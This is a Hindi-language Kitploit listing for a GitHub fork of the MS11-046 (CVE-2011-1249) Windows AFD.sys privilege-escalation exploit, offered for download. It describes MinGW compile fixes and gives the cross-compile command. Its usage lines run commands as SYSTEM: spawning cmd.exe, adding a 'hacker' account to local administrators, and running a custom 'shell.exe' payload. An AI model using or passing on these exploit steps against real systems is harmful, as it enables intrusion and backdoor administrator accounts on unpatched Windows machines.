Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
edb-40564-mingw-fix — CVE-2011-1249 (MS11-046) AFD विशेषाधिकार वृद्धि — MinGW क्रॉस-कंपाइलेशन फिक्स + कस्टम कमांड समर्थन | Kitploit
उपकरण/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
विशेषाधिकार वृद्धिपेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगबाइनरी शोषण
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) AFD विशेषाधिकार वृद्धि — MinGW क्रॉस-कंपाइलेशन फिक्स + कस्टम कमांड समर्थन

रिपॉजिटरी देखें
44 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

ms11-046-mingw

CVE-2011-1249 / MS11-046 — Windows x86 के लिए AFD.sys विशेषाधिकार वृद्धि।

मूल शोषण Tomislav Paskalev (EDB-40564) द्वारा। यह फोर्क MinGW क्रॉस-कंपाइलेशन त्रुटियों को ठीक करता है और argv[1] के माध्यम से कस्टम कमांड निष्पादन जोड़ता है।


मूल से परिवर्तन

#परिवर्तनकारण
1FARPROC ZwQuerySystemInformation → typed function pointer (pZwQuerySystemInformation)MinGW सख्त प्रकार जाँच शून्य-पैरामीटर FARPROC को तर्कों के साथ कॉल करने को अस्वीकार करती है — संकलन too many arguments to function त्रुटि के साथ विफल होता है
2securityPatches[] arrays marked staticif/else ब्लॉक के अंदर घोषित ऐरे स्टैक-आवंटित होते हैं और स्कोप से बाहर चले जाते हैं; static के बिना pointers dangle करते हैं
3Custom command via argv[1]किसी भी कमांड को SYSTEM के रूप में चलाएँ, हार्डकोडेड cmd.exe के बजाय

समस्या

मूल को MinGW के साथ कंपाइल करने पर विफलता होती है:

ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC एक जेनेरिक फंक्शन पॉइंटर है जो शून्य पैरामीटर के साथ घोषित किया गया है। MinGW सख्त प्रकार जाँच लागू करता है और इसे तर्कों के साथ कॉल करने को अस्वीकार करता है। सही हस्ताक्षर के साथ एक टाइप्ड फंक्शन पॉइंटर ही समाधान है।

पूर्व-संकलित बाइनरी मौजूद हैं (जैसे SecWiki/windows-kernel-exploits) लेकिन वे कस्टम कमांड का समर्थन नहीं करते।


Linux पर क्रॉस-कंपाइल (MinGW)

sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

उपयोग

ms11-046.exe                                             # default: spawns cmd.exe as SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # add a user as SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # add to local admins
ms11-046.exe "c:\windows\temp\shell.exe"                 # run a custom payload as SYSTEM

संदर्भ

  • MS11-046 — Microsoft सुरक्षा बुलेटिन
  • CVE-2011-1249 — राष्ट्रीय भेद्यता डेटाबेस
  • EDB-40564 — मूल शोषण
टूल डाउनलोड करें